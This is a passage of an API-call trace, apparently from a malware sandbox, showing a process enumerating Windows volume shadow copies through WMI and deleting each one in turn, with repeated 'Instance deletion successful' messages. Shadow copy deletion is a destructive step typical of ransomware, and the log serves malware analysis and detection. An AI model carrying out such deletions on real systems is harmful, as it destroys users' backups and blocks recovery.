lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0136.175] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0136.175] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0136.175] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0136.175] free (_Block=0x28d9f0) [0136.175] free (_Block=0x28ee10) [0136.175] LocalFree (hMem=0x34b630) returned 0x0 [0136.175] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0145.674] IUnknown:Release (This=0x1db3d80) returned 0x0 [0145.674] malloc (_Size=0x800) returned 0x28ee10 [0145.674] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0145.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0145.674] malloc (_Size=0x20) returned 0x28fc40 [0145.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28fc40, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0145.674] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0145.674] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0145.674] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0145.675] free (_Block=0x28fc40) [0145.675] free (_Block=0x28ee10) [0145.675] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0145.676] malloc (_Size=0x18) returned 0x28bfb0 [0145.676] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0145.676] free (_Block=0x28bfb0) [0145.676] malloc (_Size=0x800) returned 0x28ee10 [0145.676] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0145.676] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0145.676] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0145.676] malloc (_Size=0x68) returned 0x28daf0 [0145.676] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28daf0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0145.676] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0145.676] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0145.676] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0145.676] free (_Block=0x28daf0) [0145.676] free (_Block=0x28ee10) [0145.677] LocalFree (hMem=0x34b790) returned 0x0 [0145.677] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0149.666] IUnknown:Release (This=0x1db3d80) returned 0x0 [0149.666] malloc (_Size=0x800) returned 0x28ee10 [0149.666] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0149.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0149.667] malloc (_Size=0x20) returned 0x28fd50 [0149.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28fd50, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0149.667] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0149.667] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0149.667] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0149.667] free (_Block=0x28fd50) [0149.667] free (_Block=0x28ee10) [0149.667] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0149.668] malloc (_Size=0x18) returned 0x28bfb0 [0149.668] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.668] free (_Block=0x28bfb0) [0149.669] malloc (_Size=0x800) returned 0x28ee10 [0149.669] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0149.669] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0149.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0149.669] malloc (_Size=0x68) returned 0x28dc00 [0149.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dc00, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0149.669] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0149.669] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0149.669] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0149.669] free (_Block=0x28dc00) [0149.669] free (_Block=0x28ee10) [0149.669] LocalFree (hMem=0x34b790) returned 0x0 [0149.669] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0154.474] IUnknown:Release (This=0x1db3d80) returned 0x0 [0154.474] malloc (_Size=0x800) returned 0x28ee10 [0154.474] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0154.474] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0154.474] malloc (_Size=0x20) returned 0x28fe60 [0154.474] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28fe60, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0154.474] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0154.475] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0154.475] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0154.475] free (_Block=0x28fe60) [0154.475] free (_Block=0x28ee10) [0154.475] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0154.477] malloc (_Size=0x18) returned 0x28bfb0 [0154.477] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0154.477] free (_Block=0x28bfb0) [0154.477] malloc (_Size=0x800) returned 0x28ee10 [0154.477] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0154.477] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0154.477] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0154.477] malloc (_Size=0x68) returned 0x28dd10 [0154.477] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dd10, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0154.477] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0154.477] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0154.478] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0154.478] free (_Block=0x28dd10) [0154.478] free (_Block=0x28ee10) [0154.478] LocalFree (hMem=0x34b790) returned 0x0 [0154.478] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0158.853] IUnknown:Release (This=0x1db3d80) returned 0x0 [0158.853] malloc (_Size=0x800) returned 0x28ee10 [0158.853] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0158.854] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0158.854] malloc (_Size=0x20) returned 0x28ff70 [0158.854] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28ff70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0158.854] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0158.854] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0158.854] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0158.854] free (_Block=0x28ff70) [0158.854] free (_Block=0x28ee10) [0158.854] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0158.861] malloc (_Size=0x18) returned 0x28bfb0 [0158.862] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0158.862] free (_Block=0x28bfb0) [0158.862] malloc (_Size=0x800) returned 0x28d490 [0158.862] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0158.862] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0158.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0158.862] malloc (_Size=0x68) returned 0x28dca0 [0158.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0158.862] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0158.862] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0158.862] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0158.862] free (_Block=0x28dca0) [0158.862] free (_Block=0x28d490) [0158.862] LocalFree (hMem=0x34b790) returned 0x0 [0158.862] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0162.733] IUnknown:Release (This=0x1db3d80) returned 0x0 [0162.733] malloc (_Size=0x800) returned 0x28d490 [0162.733] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0162.733] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0162.733] malloc (_Size=0x20) returned 0x28dca0 [0162.734] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0162.734] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0162.734] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0162.734] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0162.734] free (_Block=0x28dca0) [0162.734] free (_Block=0x28d490) [0162.734] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0162.741] malloc (_Size=0x18) returned 0x28bfb0 [0162.741] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0162.741] free (_Block=0x28bfb0) [0162.741] malloc (_Size=0x800) returned 0x28d490 [0162.741] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0162.741] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0162.741] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0162.742] malloc (_Size=0x68) returned 0x28dca0 [0162.742] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0162.742] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0162.742] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0162.742] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0162.742] free (_Block=0x28dca0) [0162.742] free (_Block=0x28d490) [0162.742] LocalFree (hMem=0x34b790) returned 0x0 [0162.742] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0166.145] IUnknown:Release (This=0x1db3d80) returned 0x0 [0166.145] malloc (_Size=0x800) returned 0x28d490 [0166.145] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0166.145] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0166.145] malloc (_Size=0x20) returned 0x28dca0 [0166.145] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0166.145] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0166.145] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0166.145] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0166.145] free (_Block=0x28dca0) [0166.145] free (_Block=0x28d490) [0166.145] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0166.147] malloc (_Size=0x18) returned 0x28bfb0 [0166.147] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0166.148] free (_Block=0x28bfb0) [0166.148] malloc (_Size=0x800) returned 0x28d490 [0166.148] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0166.148] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="랐4") returned 0x67 [0166.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0166.148] malloc (_Size=0x68) returned 0x28dca0 [0166.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0166.148] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0166.148] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0166.148] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0166.148] free (_Block=0x28dca0) [0166.148] free (_Block=0x28d490) [0166.148] LocalFree (hMem=0x34b790) returned 0x0 [0166.148] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0170.499] IUnknown:Release (This=0x1db3d80) returned 0x0 [0170.499] malloc (_Size=0x800) returned 0x28d490 [0170.499] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0170.500] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 